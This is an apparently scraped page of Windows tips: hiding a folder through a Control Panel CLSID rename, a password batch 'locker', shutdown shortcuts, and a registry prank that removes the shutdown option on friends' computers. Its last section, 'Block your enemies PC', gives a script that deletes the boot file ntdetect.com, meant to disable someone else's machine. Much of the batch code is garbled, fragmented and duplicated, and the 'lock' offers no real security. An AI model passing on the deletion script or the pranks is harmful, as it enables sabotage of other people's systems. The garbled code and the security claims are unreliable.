Lock any folder without using any software
1. Suppose you have a folder named abcd in D:\abcd.
2. In the same drive next to the folder create a new notepad file with the exact statement
ren abcd abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D}
3. Now save this text file as loc.bat
4. Create another notepad file and type
ren abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D} abcd
5. Save this as key.bat
6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .
7. To open the folder double click key.bat and you get back your original folder.
8. For more safety keep the key.bat in another location . Only for unlocking copy paste to the original location and double click
(don't forget to replace abcd with the folder name)
echo Are you sure u want to Lock the folde
ro%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice.goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
0+h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End
we goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Un
l:MDLOCKER md Locker echo Locker created successfully goto End
:End
1. Suppose you have a folder named abcd in D:\abcd.
2. In the same drive next to the folder create a new notepad file with the exact statement
ren abcd abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D}
3. Now save this text file as loc.bat
4. Create another notepad file and type
ren abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D} abcd
5. Save this as key.bat
6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .
7. To open the folder double click key.bat and you get back your original folder.
8. For more safety keep the key.bat in another location . Only for unlocking copy paste to the original location and double click
(don't forget to replace abcd with the folder name)
Or
Paste it on note pad
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER :CONFIRM (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %ch
ro%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice.
9D}"
attrib
0+h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End
ord her
:UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==type your passwe goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ocked successfully
goto End
:FAIL
ssword goto end
echo Invalid p
a
l:MDLOCKER md Locker echo Locker created successfully goto End
Save it as batch file(with extension .bat).Any name will do.
Now you see a batch file.
Double click it to create a folder locker.
A new folder named Locker would be formed at the same location.
Now brings all the files you want to hide in the locker folder.
Now double click the batch file to lock the folder namely Locker.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.
Now you see a batch file.
Double click it to create a folder locker.
A new folder named Locker would be formed at the same location.
Now brings all the files you want to hide in the locker folder.
Now double click the batch file to lock the folder namely Locker.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.
Create desktop icon for restart and shutdown
Do the following:
1. Right click on your desktop
2. Then in NEW click on SHORTCUT
3. A shortcut wizard will appear
4. Type this in the box:
shutdown -s -t 00
5. Your done now right click on the folder>properties>Change Icon
And then choose any appropriate icon
For restart instead of -s type -r
Do the following:
1. Right click on your desktop
2. Then in NEW click on SHORTCUT
3. A shortcut wizard will appear
4. Type this in the box:
shutdown -s -t 00
5. Your done now right click on the folder>properties>Change Icon
And then choose any appropriate icon
For restart instead of -s type -r
Remove shut down option
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Click on start>run(win key+r)
Then tpye “regedit” there, this opens up the registry editor, now goto
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Explorer
Then set “NoClose”=”DWORD:1
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Click on start>run(win key+r)
Then tpye “regedit” there, this opens up the registry editor, now goto
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Explorer
Then set “NoClose”=”DWORD:1
Block your enemies PC
Open notepad and copy the below code
Open notepad and copy the below code
echo off C: cd.. cd.. cd.. attrib -r -s -h ntdetect.com del ntdetect.com echo on print U r a LOSER GK is a Winner
Save it as anyname.vbs like virus.vbs
And then double click on it.
Now if u want to disable this go to task manager click on process
Then find wscript.exe and end this process
And then double click on it.
Now if u want to disable this go to task manager click on process
Then find wscript.exe and end this process